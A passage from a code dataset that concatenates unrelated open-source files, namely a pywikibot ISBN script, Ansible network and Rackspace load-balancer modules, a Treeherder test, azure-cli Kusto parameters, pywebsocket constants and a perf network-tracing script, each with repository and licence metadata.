old_isbn = "ISBN " + isbn
if self.getOption('format'):
new_isbn = hyphenateIsbnNumbers(old_isbn)
if self.getOption('to13'):
new_isbn = convertIsbn10toIsbn13(old_isbn)
item.claims[claim.getID()].remove(claim)
claim = pywikibot.Claim(self.repo, self.isbn_13_prop_id)
claim.setTarget(new_isbn)
if self.isbn_13_prop_id in item.claims:
item.claims[self.isbn_13_prop_id].append(claim)
else:
item.claims[self.isbn_13_prop_id] = [claim]
change_messages.append('Changing %s (%s) to %s (%s)' %
(self.isbn_10_prop_id, old_isbn,
self.isbn_13_prop_id, new_isbn))
continue
if old_isbn == new_isbn:
continue
# remove 'ISBN ' prefix
assert new_isbn.startswith('ISBN '), 'ISBN should start with "ISBN"'
new_isbn = new_isbn[5:]
claim.setTarget(new_isbn)
change_messages.append('Changing %s (%s --> %s)' %
(self.isbn_10_prop_id, old_isbn,
new_isbn))
# -format is the only option that has any effect on ISBN13
if self.getOption('format') and self.isbn_13_prop_id in item.claims:
for claim in item.claims[self.isbn_13_prop_id]:
isbn = claim.getTarget()
try:
is_valid(isbn)
except InvalidIsbnException as e:
pywikibot.output(e)
continue
old_isbn = "ISBN " + isbn
new_isbn = hyphenateIsbnNumbers(old_isbn)
if old_isbn == new_isbn:
continue
change_messages.append(
'Changing %s (%s --> %s)' % (self.isbn_13_prop_id,
claim.getTarget(), new_isbn))
claim.setTarget(new_isbn)
if change_messages:
self.current_page = item
pywikibot.output('\n'.join(change_messages))
self.user_edit_entity(item, summary=self.comment)
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: list of unicode
"""
options = {}
# Process global args and prepare generator args parser
local_args = pywikibot.handle_args(args)
genFactory = pagegenerators.GeneratorFactory()
# Check whether we're running on Wikibase site or not
# FIXME: See T85483 and run() in WikidataBot
site = pywikibot.Site()
data_site = site.data_repository()
use_wikibase = (data_site is not None and
data_site.family == site.family and
data_site.code == site.code)
for arg in local_args:
if arg.startswith('-prop-isbn-10:'):
options[arg[1:len('-prop-isbn-10')]] = arg[len('-prop-isbn-10:'):]
elif arg.startswith('-prop-isbn-13:'):
options[arg[1:len('-prop-isbn-13')]] = arg[len('-prop-isbn-13:'):]
elif arg.startswith('-') and arg[1:] in ('always', 'to13', 'format'):
options[arg[1:]] = True
else:
genFactory.handleArg(arg)
gen = genFactory.getCombinedGenerator(preload=True)
if gen:
if use_wikibase:
bot = IsbnWikibaseBot(gen, **options)
else:
bot = IsbnBot(gen, **options)
bot.run()
return True
else:
pywikibot.bot.suggest_help(missing_generator=True)
return False
if __name__ == "__main__":
main()
|
mit
|
adityacs/ansible
|
lib/ansible/utils/module_docs_fragments/openswitch.py
|
166
|
4001
|
#
# (c) 2015, Peter Sprygada <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
class ModuleDocFragment(object):
# Standard files documentation fragment
DOCUMENTATION = """
options:
host:
description:
- Specifies the DNS host name or address for connecting to the remote
device over the specified transport. The value of host is used as
the destination address for the transport. Note this argument
does not affect the SSH argument.
required: true
port:
description:
- Specifies the port to use when building the connection to the remote
device. This value applies to either I(cli) or I(rest). The port
value will default to the appropriate transport common port if
none is provided in the task. (cli=22, http=80, https=443). Note
this argument does not affect the SSH transport.
required: false
default: 0 (use common port)
username:
description:
- Configures the username to use to authenticate the connection to
the remote device. This value is used to authenticate
either the CLI login or the eAPI authentication depending on which
transport is used. Note this argument does not affect the SSH
transport. If the value is not specified in the task, the value of
environment variable C(ANSIBLE_NET_USERNAME) will be used instead.
required: false
password:
description:
- Specifies the password to use to authenticate the connection to
the remote device. This is a common argument used for either I(cli)
or I(rest) transports. Note this argument does not affect the SSH
transport. If the value is not specified in the task, the value of
environment variable C(ANSIBLE_NET_PASSWORD) will be used instead.
required: false
default: null
timeout:
description:
- Specifies the timeout in seconds for communicating with the network device
for either connecting or sending commands. If the timeout is
exceeded before the operation is completed, the module will error.
require: false
default: 10
ssh_keyfile:
description:
- Specifies the SSH key to use to authenticate the connection to
the remote device. This argument is only used for the I(cli)
transports. If the value is not specified in the task, the value of
environment variable C(ANSIBLE_NET_SSH_KEYFILE) will be used instead.
required: false
transport:
description:
- Configures the transport connection to use when connecting to the
remote device. The transport argument supports connectivity to the
device over ssh, cli or REST.
required: true
default: ssh
choices: ['ssh', 'cli', 'rest']
use_ssl:
description:
- Configures the I(transport) to use SSL if set to true only when the
I(transport) argument is configured as rest. If the transport
argument is not I(rest), this value is ignored.
required: false
default: yes
choices: ['yes', 'no']
provider:
description:
- Convenience method that allows all I(openswitch) arguments to be passed as
a dict object. All constraints (required, choices, etc) must be
met either by individual arguments or values in this dict.
required: false
default: null
"""
|
gpl-3.0
|
vaishalitekale/treeherder
|
tests/etl/test_perf_data_adapters.py
|
1
|
2747
|
import json
import zlib
from tests.sampledata import SampleData
from treeherder.etl.perf_data_adapters import TalosDataAdapter
def test_adapt_and_load():
talos_perf_data = SampleData.get_talos_perf_data()
tda = TalosDataAdapter()
result_count = 0
for datum in talos_perf_data:
datum = {
"job_guid": 'oqiwy0q847365qiu',
"name": "test",
"type": "test",
"blob": datum
}
job_data = {
"oqiwy0q847365qiu": {
"id": 1,
"result_set_id": 1,
"push_timestamp": 1402692388
}
}
reference_data = {
"property1": "value1",
"property2": "value2",
"property3": "value3"
}
# one extra result for the summary series
result_count += len(datum['blob']["results"]) + 1
# we create one performance series per counter
if 'talos_counters' in datum['blob']:
result_count += len(datum['blob']["talos_counters"])
# Mimic production environment, the blobs are serialized
# when the web service receives them
datum['blob'] = json.dumps({'talos_data': [datum['blob']]})
tda.adapt_and_load(reference_data, job_data, datum)
# we upload a summary with a suite and subtest values, +1 for suite
if 'summary' in datum['blob']:
results = json.loads(zlib.decompress(tda.performance_artifact_placeholders[-1][4]))
data = json.loads(datum['blob'])['talos_data'][0]
assert results["blob"]["performance_series"]["geomean"] == data['summary']['suite']
# deal with the subtests now
for i in range(0, len(data['summary']['subtests'])):
subresults = json.loads(zlib.decompress(tda.performance_artifact_placeholders[-1 - i][4]))
if 'subtest_signatures' in subresults["blob"]['signature_properties']:
# ignore summary signatures
continue
subdata = data['summary']['subtests'][subresults["blob"]['signature_properties']['test']]
for datatype in ['min', 'max', 'mean', 'median', 'std']:
assert subdata[datatype] == subresults["blob"]["performance_series"][datatype]
if 'value' in subdata.keys():
assert subdata['value'] == subresults["blob"]["performance_series"]['value']
else:
# FIXME: the talos data blob we're currently using contains datums with summaries and those without
# we should probably test non-summarized data as well
pass
assert result_count == len(tda.performance_artifact_placeholders)
|
mpl-2.0
|
mschurenko/ansible-modules-core
|
cloud/rackspace/rax_clb_nodes.py
|
43
|
8603
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
DOCUMENTATION = '''
---
module: rax_clb_nodes
short_description: add, modify and remove nodes from a Rackspace Cloud Load Balancer
description:
- Adds, modifies and removes nodes from a Rackspace Cloud Load Balancer
version_added: "1.4"
options:
address:
required: false
description:
- IP address or domain name of the node
condition:
required: false
choices:
- enabled
- disabled
- draining
description:
- Condition for the node, which determines its role within the load
balancer
load_balancer_id:
required: true
type: integer
description:
- Load balancer id
node_id:
required: false
type: integer
description:
- Node id
port:
required: false
type: integer
description:
- Port number of the load balanced service on the node
state:
required: false
default: "present"
choices:
- present
- absent
description:
- Indicate desired state of the node
type:
required: false
choices:
- primary
- secondary
description:
- Type of node
wait:
required: false
default: "no"
choices:
- "yes"
- "no"
description:
- Wait for the load balancer to become active before returning
wait_timeout:
required: false
type: integer
default: 30
description:
- How long to wait before giving up and returning an error
weight:
required: false
description:
- Weight of node
author: Lukasz Kawczynski
extends_documentation_fragment: rackspace
'''
EXAMPLES = '''
# Add a new node to the load balancer
- local_action:
module: rax_clb_nodes
load_balancer_id: 71
address: 10.2.2.3
port: 80
condition: enabled
type: primary
wait: yes
credentials: /path/to/credentials
# Drain connections from a node
- local_action:
module: rax_clb_nodes
load_balancer_id: 71
node_id: 410
condition: draining
wait: yes
credentials: /path/to/credentials
# Remove a node from the load balancer
- local_action:
module: rax_clb_nodes
load_balancer_id: 71
node_id: 410
state: absent
wait: yes
credentials: /path/to/credentials
'''
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def _activate_virtualenv(path):
path = os.path.expanduser(path)
activate_this = os.path.join(path, 'bin', 'activate_this.py')
execfile(activate_this, dict(__file__=activate_this))
def _get_node(lb, node_id=None, address=None, port=None):
"""Return a matching node"""
for node in getattr(lb, 'nodes', []):
match_list = []
if node_id is not None:
match_list.append(getattr(node, 'id', None) == node_id)
if address is not None:
match_list.append(getattr(node, 'address', None) == address)
if port is not None:
match_list.append(getattr(node, 'port', None) == port)
if match_list and all(match_list):
return node
return None
def main():
argument_spec = rax_argument_spec()
argument_spec.update(
dict(
address=dict(),
condition=dict(choices=['enabled', 'disabled', 'draining']),
load_balancer_id=dict(required=True, type='int'),
node_id=dict(type='int'),
port=dict(type='int'),
state=dict(default='present', choices=['present', 'absent']),
type=dict(choices=['primary', 'secondary']),
virtualenv=dict(),
wait=dict(default=False, type='bool'),
wait_timeout=dict(default=30, type='int'),
weight=dict(type='int'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together(),
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module')
address = module.params['address']
condition = (module.params['condition'] and
module.params['condition'].upper())
load_balancer_id = module.params['load_balancer_id']
node_id = module.params['node_id']
port = module.params['port']
state = module.params['state']
typ = module.params['type'] and module.params['type'].upper()
virtualenv = module.params['virtualenv']
wait = module.params['wait']
wait_timeout = module.params['wait_timeout'] or 1
weight = module.params['weight']
if virtualenv:
try:
_activate_virtualenv(virtualenv)
except IOError, e:
module.fail_json(msg='Failed to activate virtualenv %s (%s)' % (
virtualenv, e))
setup_rax_module(module, pyrax)
if not pyrax.cloud_loadbalancers:
module.fail_json(msg='Failed to instantiate client. This '
'typically indicates an invalid region or an '
'incorrectly capitalized region name.')
try:
lb = pyrax.cloud_loadbalancers.get(load_balancer_id)
except pyrax.exc.PyraxException, e:
module.fail_json(msg='%s' % e.message)
node = _get_node(lb, node_id, address, port)
result = rax_clb_node_to_dict(node)
if state == 'absent':
if not node: # Removing a non-existent node
module.exit_json(changed=False, state=state)
try:
lb.delete_node(node)
result = {}
except pyrax.exc.NotFound:
module.exit_json(changed=False, state=state)
except pyrax.exc.PyraxException, e:
module.fail_json(msg='%s' % e.message)
else: # present
if not node:
if node_id: # Updating a non-existent node
msg = 'Node %d not found' % node_id
if lb.nodes:
msg += (' (available nodes: %s)' %
', '.join([str(x.id) for x in lb.nodes]))
module.fail_json(msg=msg)
else: # Creating a new node
try:
node = pyrax.cloudloadbalancers.Node(
address=address, port=port, condition=condition,
weight=weight, type=typ)
resp, body = lb.add_nodes([node])
result.update(body['nodes'][0])
except pyrax.exc.PyraxException, e:
module.fail_json(msg='%s' % e.message)
else: # Updating an existing node
mutable = {
'condition': condition,
'type': typ,
'weight': weight,
}
for name, value in mutable.items():
if value is None or value == getattr(node, name):
mutable.pop(name)
if not mutable:
module.exit_json(changed=False, state=state, node=result)
try:
# The diff has to be set explicitly to update node's weight and
# type; this should probably be fixed in pyrax
lb.update_node(node, diff=mutable)
result.update(mutable)
except pyrax.exc.PyraxException, e:
module.fail_json(msg='%s' % e.message)
if wait:
pyrax.utils.wait_until(lb, "status", "ACTIVE", interval=1,
attempts=wait_timeout)
if lb.status != 'ACTIVE':
module.fail_json(
msg='Load balancer not active after %ds (current status: %s)' %
(wait_timeout, lb.status.lower()))
kwargs = {'node': result} if result else {}
module.exit_json(changed=True, state=state, **kwargs)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
# invoke the module
main()
|
gpl-3.0
|
yugangw-msft/azure-cli
|
src/azure-cli/azure/cli/command_modules/kusto/_params.py
|
6
|
1902
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from knack.arguments import CLIArgumentType
from azure.cli.core.commands.parameters import (name_type, get_enum_type)
from .custom import (
AzureSkuName
)
def load_arguments(self, _):
# Kusto clusters
sku_arg_type = CLIArgumentType(help='The name of the sku.',
arg_type=get_enum_type(AzureSkuName))
time_format_explenation = 'Duration in ISO8601 format (for example, 100 days would be P100D).'
with self.argument_context('kusto cluster') as c:
c.ignore('kusto_management_request_options')
c.argument('cluster_name', arg_type=name_type, help='The name of the cluster.', id_part='name')
c.argument('sku', arg_type=sku_arg_type)
c.argument('capacity', type=int, help='The instance number of the VM.')
# Kusto databases
with self.argument_context('kusto database') as c:
c.ignore('kusto_management_request_options')
c.argument('cluster_name', help='The name of the cluster.', id_part='name')
c.argument('database_name', arg_type=name_type, help='The name of the database.', id_part='child_name_1')
c.argument('soft_delete_period', help='Amount of time that data should be kept so it is available to query. ' + time_format_explenation)
c.argument('hot_cache_period', help='Amount of time that data should be kept in cache.' + time_format_explenation)
# Kusto database list
with self.argument_context('kusto database list') as c:
c.argument('cluster_name', id_part=None)
|
mit
|
yanirs/servo
|
tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/common.py
|
489
|
9947
|
# Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file must not depend on any module specific to the WebSocket protocol.
"""
from mod_pywebsocket import http_header_util
# Additional log level definitions.
LOGLEVEL_FINE = 9
# Constants indicating WebSocket protocol version.
VERSION_HIXIE75 = -1
VERSION_HYBI00 = 0
VERSION_HYBI01 = 1
VERSION_HYBI02 = 2
VERSION_HYBI03 = 2
VERSION_HYBI04 = 4
VERSION_HYBI05 = 5
VERSION_HYBI06 = 6
VERSION_HYBI07 = 7
VERSION_HYBI08 = 8
VERSION_HYBI09 = 8
VERSION_HYBI10 = 8
VERSION_HYBI11 = 8
VERSION_HYBI12 = 8
VERSION_HYBI13 = 13
VERSION_HYBI14 = 13
VERSION_HYBI15 = 13
VERSION_HYBI16 = 13
VERSION_HYBI17 = 13
# Constants indicating WebSocket protocol latest version.
VERSION_HYBI_LATEST = VERSION_HYBI13
# Port numbers
DEFAULT_WEB_SOCKET_PORT = 80
DEFAULT_WEB_SOCKET_SECURE_PORT = 443
# Schemes
WEB_SOCKET_SCHEME = 'ws'
WEB_SOCKET_SECURE_SCHEME = 'wss'
# Frame opcodes defined in the spec.
OPCODE_CONTINUATION = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
# UUIDs used by HyBi 04 and later opening handshake and frame masking.
WEBSOCKET_ACCEPT_UUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
# Opening handshake header names and expected values.
UPGRADE_HEADER = 'Upgrade'
WEBSOCKET_UPGRADE_TYPE = 'websocket'
WEBSOCKET_UPGRADE_TYPE_HIXIE75 = 'WebSocket'
CONNECTION_HEADER = 'Connection'
UPGRADE_CONNECTION_TYPE = 'Upgrade'
HOST_HEADER = 'Host'
ORIGIN_HEADER = 'Origin'
SEC_WEBSOCKET_ORIGIN_HEADER = 'Sec-WebSocket-Origin'
SEC_WEBSOCKET_KEY_HEADER = 'Sec-WebSocket-Key'
SEC_WEBSOCKET_ACCEPT_HEADER = 'Sec-WebSocket-Accept'
SEC_WEBSOCKET_VERSION_HEADER = 'Sec-WebSocket-Version'
SEC_WEBSOCKET_PROTOCOL_HEADER = 'Sec-WebSocket-Protocol'
SEC_WEBSOCKET_EXTENSIONS_HEADER = 'Sec-WebSocket-Extensions'
SEC_WEBSOCKET_DRAFT_HEADER = 'Sec-WebSocket-Draft'
SEC_WEBSOCKET_KEY1_HEADER = 'Sec-WebSocket-Key1'
SEC_WEBSOCKET_KEY2_HEADER = 'Sec-WebSocket-Key2'
SEC_WEBSOCKET_LOCATION_HEADER = 'Sec-WebSocket-Location'
# Extensions
DEFLATE_FRAME_EXTENSION = 'deflate-frame'
PERMESSAGE_COMPRESSION_EXTENSION = 'permessage-compress'
PERMESSAGE_DEFLATE_EXTENSION = 'permessage-deflate'
X_WEBKIT_DEFLATE_FRAME_EXTENSION = 'x-webkit-deflate-frame'
X_WEBKIT_PERMESSAGE_COMPRESSION_EXTENSION = 'x-webkit-permessage-compress'
MUX_EXTENSION = 'mux_DO_NOT_USE'
# Status codes
# Code STATUS_NO_STATUS_RECEIVED, STATUS_ABNORMAL_CLOSURE, and
# STATUS_TLS_HANDSHAKE are pseudo codes to indicate specific error cases.
# Could not be used for codes in actual closing frames.
# Application level errors must use codes in the range
# STATUS_USER_REGISTERED_BASE to STATUS_USER_PRIVATE_MAX. The codes in the
# range STATUS_USER_REGISTERED_BASE to STATUS_USER_REGISTERED_MAX are managed
# by IANA. Usually application must define user protocol level errors in the
# range STATUS_USER_PRIVATE_BASE to STATUS_USER_PRIVATE_MAX.
STATUS_NORMAL_CLOSURE = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA = 1003
STATUS_NO_STATUS_RECEIVED = 1005
STATUS_ABNORMAL_CLOSURE = 1006
STATUS_INVALID_FRAME_PAYLOAD_DATA = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_MANDATORY_EXTENSION = 1010
STATUS_INTERNAL_ENDPOINT_ERROR = 1011
STATUS_TLS_HANDSHAKE = 1015
STATUS_USER_REGISTERED_BASE = 3000
STATUS_USER_REGISTERED_MAX = 3999
STATUS_USER_PRIVATE_BASE = 4000
STATUS_USER_PRIVATE_MAX = 4999
# Following definitions are aliases to keep compatibility. Applications must
# not use these obsoleted definitions anymore.
STATUS_NORMAL = STATUS_NORMAL_CLOSURE
STATUS_UNSUPPORTED = STATUS_UNSUPPORTED_DATA
STATUS_CODE_NOT_AVAILABLE = STATUS_NO_STATUS_RECEIVED
STATUS_ABNORMAL_CLOSE = STATUS_ABNORMAL_CLOSURE
STATUS_INVALID_FRAME_PAYLOAD = STATUS_INVALID_FRAME_PAYLOAD_DATA
STATUS_MANDATORY_EXT = STATUS_MANDATORY_EXTENSION
# HTTP status codes
HTTP_STATUS_BAD_REQUEST = 400
HTTP_STATUS_FORBIDDEN = 403
HTTP_STATUS_NOT_FOUND = 404
def is_control_opcode(opcode):
return (opcode >> 3) == 1
class ExtensionParameter(object):
"""Holds information about an extension which is exchanged on extension
negotiation in opening handshake.
"""
def __init__(self, name):
self._name = name
# TODO(tyoshino): Change the data structure to more efficient one such
# as dict when the spec changes to say like
# - Parameter names must be unique
# - The order of parameters is not significant
self._parameters = []
def name(self):
return self._name
def add_parameter(self, name, value):
self._parameters.append((name, value))
def get_parameters(self):
return self._parameters
def get_parameter_names(self):
return [name for name, unused_value in self._parameters]
def has_parameter(self, name):
for param_name, param_value in self._parameters:
if param_name == name:
return True
return False
def get_parameter_value(self, name):
for param_name, param_value in self._parameters:
if param_name == name:
return param_value
class ExtensionParsingException(Exception):
def __init__(self, name):
super(ExtensionParsingException, self).__init__(name)
def _parse_extension_param(state, definition):
param_name = http_header_util.consume_token(state)
if param_name is None:
raise ExtensionParsingException('No valid parameter name found')
http_header_util.consume_lwses(state)
if not http_header_util.consume_string(state, '='):
definition.add_parameter(param_name, None)
return
http_header_util.consume_lwses(state)
# TODO(tyoshino): Add code to validate that parsed param_value is token
param_value = http_header_util.consume_token_or_quoted_string(state)
if param_value is None:
raise ExtensionParsingException(
'No valid parameter value found on the right-hand side of '
'parameter %r' % param_name)
definition.add_parameter(param_name, param_value)
def _parse_extension(state):
extension_token = http_header_util.consume_token(state)
if extension_token is None:
return None
extension = ExtensionParameter(extension_token)
while True:
http_header_util.consume_lwses(state)
if not http_header_util.consume_string(state, ';'):
break
http_header_util.consume_lwses(state)
try:
_parse_extension_param(state, extension)
except ExtensionParsingException, e:
raise ExtensionParsingException(
'Failed to parse parameter for %r (%r)' %
(extension_token, e))
return extension
def parse_extensions(data):
"""Parses Sec-WebSocket-Extensions header value returns a list of
ExtensionParameter objects.
Leading LWSes must be trimmed.
"""
state = http_header_util.ParsingState(data)
extension_list = []
while True:
extension = _parse_extension(state)
if extension is not None:
extension_list.append(extension)
http_header_util.consume_lwses(state)
if http_header_util.peek(state) is None:
break
if not http_header_util.consume_string(state, ','):
raise ExtensionParsingException(
'Failed to parse Sec-WebSocket-Extensions header: '
'Expected a comma but found %r' %
http_header_util.peek(state))
http_header_util.consume_lwses(state)
if len(extension_list) == 0:
raise ExtensionParsingException(
'No valid extension entry found')
return extension_list
def format_extension(extension):
"""Formats an ExtensionParameter object."""
formatted_params = [extension.name()]
for param_name, param_value in extension.get_parameters():
if param_value is None:
formatted_params.append(param_name)
else:
quoted_value = http_header_util.quote_if_necessary(param_value)
formatted_params.append('%s=%s' % (param_name, quoted_value))
return '; '.join(formatted_params)
def format_extensions(extension_list):
"""Formats a list of ExtensionParameter objects."""
formatted_extension_list = []
for extension in extension_list:
formatted_extension_list.append(format_extension(extension))
return ', '.join(formatted_extension_list)
# vi:sts=4 sw=4 et
|
mpl-2.0
|
GuneetAtwal/Blaze.Kernel-MT6589
|
tools/perf/scripts/python/netdev-times.py
|
11271
|
15048
|
# Display a process of packets and processed time.
# It helps us to investigate networking or network device.
#
# options
# tx: show only tx chart
# rx: show only rx chart
# dev=: show only thing related to specified device
# debug: work with debug mode. It shows buffer status.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
all_event_list = []; # insert all tracepoint event related with this script
irq_dic = {}; # key is cpu and value is a list which stacks irqs
# which raise NET_RX softirq
net_rx_dic = {}; # key is cpu and value include time of NET_RX softirq-entry
# and a list which stacks receive
receive_hunk_list = []; # a list which include a sequence of receive events
rx_skb_list = []; # received packet list for matching
# skb_copy_datagram_iovec
buffer_budget = 65536; # the budget of rx_skb_list, tx_queue_list and
# tx_xmit_list
of_count_rx_skb_list = 0; # overflow count
tx_queue_list = []; # list of packets which pass through dev_queue_xmit
of_count_tx_queue_list = 0; # overflow count
tx_xmit_list = []; # list of packets which pass through dev_hard_start_xmit
of_count_tx_xmit_list = 0; # overflow count
tx_free_list = []; # list of packets which is freed
# options
show_tx = 0;
show_rx = 0;
dev = 0; # store a name of device specified by option "dev="
debug = 0;
# indices of event_info tuple
EINFO_IDX_NAME= 0
EINFO_IDX_CONTEXT=1
EINFO_IDX_CPU= 2
EINFO_IDX_TIME= 3
EINFO_IDX_PID= 4
EINFO_IDX_COMM= 5
# Calculate a time interval(msec) from src(nsec) to dst(nsec)
def diff_msec(src, dst):
return (dst - src) / 1000000.0
# Display a process of transmitting a packet
def print_transmit(hunk):
if dev != 0 and hunk['dev'].find(dev) < 0:
return
print "%7s %5d %6d.%06dsec %12.3fmsec %12.3fmsec" % \
(hunk['dev'], hunk['len'],
nsecs_secs(hunk['queue_t']),
nsecs_nsecs(hunk['queue_t'])/1000,
diff_msec(hunk['queue_t'], hunk['xmit_t']),
diff_msec(hunk['xmit_t'], hunk['free_t']))
# Format for displaying rx packet processing
PF_IRQ_ENTRY= " irq_entry(+%.3fmsec irq=%d:%s)"
PF_SOFT_ENTRY=" softirq_entry(+%.3fmsec)"
PF_NAPI_POLL= " napi_poll_exit(+%.3fmsec %s)"
PF_JOINT= " |"
PF_WJOINT= " | |"
PF_NET_RECV= " |---netif_receive_skb(+%.3fmsec skb=%x len=%d)"
PF_NET_RX= " |---netif_rx(+%.3fmsec skb=%x)"
PF_CPY_DGRAM= " | skb_copy_datagram_iovec(+%.3fmsec %d:%s)"
PF_KFREE_SKB= " | kfree_skb(+%.3fmsec location=%x)"
PF_CONS_SKB= " | consume_skb(+%.3fmsec)"
# Display a process of received packets and interrputs associated with
# a NET_RX softirq
def print_receive(hunk):
show_hunk = 0
irq_list = hunk['irq_list']
cpu = irq_list[0]['cpu']
base_t = irq_list[0]['irq_ent_t']
# check if this hunk should be showed
if dev != 0:
for i in range(len(irq_list)):
if irq_list[i]['name'].find(dev) >= 0:
show_hunk = 1
break
else:
show_hunk = 1
if show_hunk == 0:
return
print "%d.%06dsec cpu=%d" % \
(nsecs_secs(base_t), nsecs_nsecs(base_t)/1000, cpu)
for i in range(len(irq_list)):
print PF_IRQ_ENTRY % \
(diff_msec(base_t, irq_list[i]['irq_ent_t']),
irq_list[i]['irq'], irq_list[i]['name'])
print PF_JOINT
irq_event_list = irq_list[i]['event_list']
for j in range(len(irq_event_list)):
irq_event = irq_event_list[j]
if irq_event['event'] == 'netif_rx':
print PF_NET_RX % \
(diff_msec(base_t, irq_event['time']),
irq_event['skbaddr'])
print PF_JOINT
print PF_SOFT_ENTRY % \
diff_msec(base_t, hunk['sirq_ent_t'])
print PF_JOINT
event_list = hunk['event_list']
for i in range(len(event_list)):
event = event_list[i]
if event['event_name'] == 'napi_poll':
print PF_NAPI_POLL % \
(diff_msec(base_t, event['event_t']), event['dev'])
if i == len(event_list) - 1:
print ""
else:
print PF_JOINT
else:
print PF_NET_RECV % \
(diff_msec(base_t, event['event_t']), event['skbaddr'],
event['len'])
if 'comm' in event.keys():
print PF_WJOINT
print PF_CPY_DGRAM % \
(diff_msec(base_t, event['comm_t']),
event['pid'], event['comm'])
elif 'handle' in event.keys():
print PF_WJOINT
if event['handle'] == "kfree_skb":
print PF_KFREE_SKB % \
(diff_msec(base_t,
event['comm_t']),
event['location'])
elif event['handle'] == "consume_skb":
print PF_CONS_SKB % \
diff_msec(base_t,
event['comm_t'])
print PF_JOINT
def trace_begin():
global show_tx
global show_rx
global dev
global debug
for i in range(len(sys.argv)):
if i == 0:
continue
arg = sys.argv[i]
if arg == 'tx':
show_tx = 1
elif arg =='rx':
show_rx = 1
elif arg.find('dev=',0, 4) >= 0:
dev = arg[4:]
elif arg == 'debug':
debug = 1
if show_tx == 0 and show_rx == 0:
show_tx = 1
show_rx = 1
def trace_end():
# order all events in time
all_event_list.sort(lambda a,b :cmp(a[EINFO_IDX_TIME],
b[EINFO_IDX_TIME]))
# process all events
for i in range(len(all_event_list)):
event_info = all_event_list[i]
name = event_info[EINFO_IDX_NAME]
if name == 'irq__softirq_exit':
handle_irq_softirq_exit(event_info)
elif name == 'irq__softirq_entry':
handle_irq_softirq_entry(event_info)
elif name == 'irq__softirq_raise':
handle_irq_softirq_raise(event_info)
elif name == 'irq__irq_handler_entry':
handle_irq_handler_entry(event_info)
elif name == 'irq__irq_handler_exit':
handle_irq_handler_exit(event_info)
elif name == 'napi__napi_poll':
handle_napi_poll(event_info)
elif name == 'net__netif_receive_skb':
handle_netif_receive_skb(event_info)
elif name == 'net__netif_rx':
handle_netif_rx(event_info)
elif name == 'skb__skb_copy_datagram_iovec':
handle_skb_copy_datagram_iovec(event_info)
elif name == 'net__net_dev_queue':
handle_net_dev_queue(event_info)
elif name == 'net__net_dev_xmit':
handle_net_dev_xmit(event_info)
elif name == 'skb__kfree_skb':
handle_kfree_skb(event_info)
elif name == 'skb__consume_skb':
handle_consume_skb(event_info)
# display receive hunks
if show_rx:
for i in range(len(receive_hunk_list)):
print_receive(receive_hunk_list[i])
# display transmit hunks
if show_tx:
print " dev len Qdisc " \
" netdevice free"
for i in range(len(tx_free_list)):
